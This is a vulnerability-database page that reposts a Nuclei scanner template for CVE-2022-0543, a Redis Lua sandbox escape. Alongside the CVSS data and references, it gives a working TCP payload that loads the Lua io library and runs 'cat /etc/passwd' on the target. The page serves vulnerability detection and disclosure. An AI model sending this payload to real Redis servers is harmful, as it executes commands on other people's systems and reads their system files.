CVE-2022-0543: Redis Sandbox Escape - Remote Code Execution

日期: 2025-08-01 | 影响软件: Redis | POC: 已公开

漏洞描述

This template exploits CVE-2022-0543, a Lua-based Redis sandbox escape. The vulnerability was introduced by Debian and Ubuntu Redis packages that insufficiently sanitized the Lua environment. The maintainers failed to disable the package interface, allowing attackers to load arbitrary libraries.

PoC代码[已公开]

id: CVE-2022-0543

info:
  name: Redis Sandbox Escape - Remote Code Execution
  author: dwisiswant0
  severity: critical
  description: |
    This template exploits CVE-2022-0543, a Lua-based Redis sandbox escape. The
    vulnerability was introduced by Debian and Ubuntu Redis packages that
    insufficiently sanitized the Lua environment. The maintainers failed to
    disable the package interface, allowing attackers to load arbitrary libraries.
  impact: |
    Successful exploitation of this vulnerability can lead to unauthorized access, data theft, and compromise of the affected system.
  remediation: Update to the most recent versions currently available.
  reference:
    - https://www.ubercomp.com/posts/2022-01-20_redis_on_debian_rce
    - https://attackerkb.com/topics/wyA1c1HIC8/cve-2022-0543/rapid7-analysis#rapid7-analysis
    - https://bugs.debian.org/1005787
    - https://www.debian.org/security/2022/dsa-5081
    - https://lists.debian.org/debian-security-announce/2022/msg00048.html
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H
    cvss-score: 10
    cve-id: CVE-2022-0543
    epss-score: 0.94417
    epss-percentile: 0.99976
    cpe: cpe:2.3:a:redis:redis:-:*:*:*:*:*:*:*
  metadata:
    max-request: 2
    vendor: redis
    product: redis
    shodan-query:
      - redis_version
      - redis
  tags: cve,cve2022,network,redis,unauth,rce,kev,tcp,vkev,vuln
tcp:
  - host:
      - "{{Hostname}}"
      - "tls://{{Hostname}}"
    port: 6380

    inputs:
      - data: "eval 'local io_l = package.loadlib(\"/usr/lib/x86_64-linux-gnu/liblua5.1.so.0\", \"luaopen_io\"); local io = io_l(); local f = io.popen(\"cat /etc/passwd\", \"r\"); local res = f:read(\"*a\"); f:close(); return res' 0\r\n"
    read-size: 64

    matchers:
      - type: regex
        regex:
          - "root:.*:0:0:"
# digest: 4a0a00473045022065db85e203141f557665b0dc2e7dfea15a8601b5f97b1ba962c670cf9a37da8a022100f2888ffac81ee9fab2f729eadfb5e02f91fcffadf54661fef38d65be3571b6e5:922c64590222798bb761d5b6d8e72950
来源: https://github.com/projectdiscovery/nuclei-templates/blob/main/network/cves/2022/CVE-2022-0543.yaml

相关漏洞推荐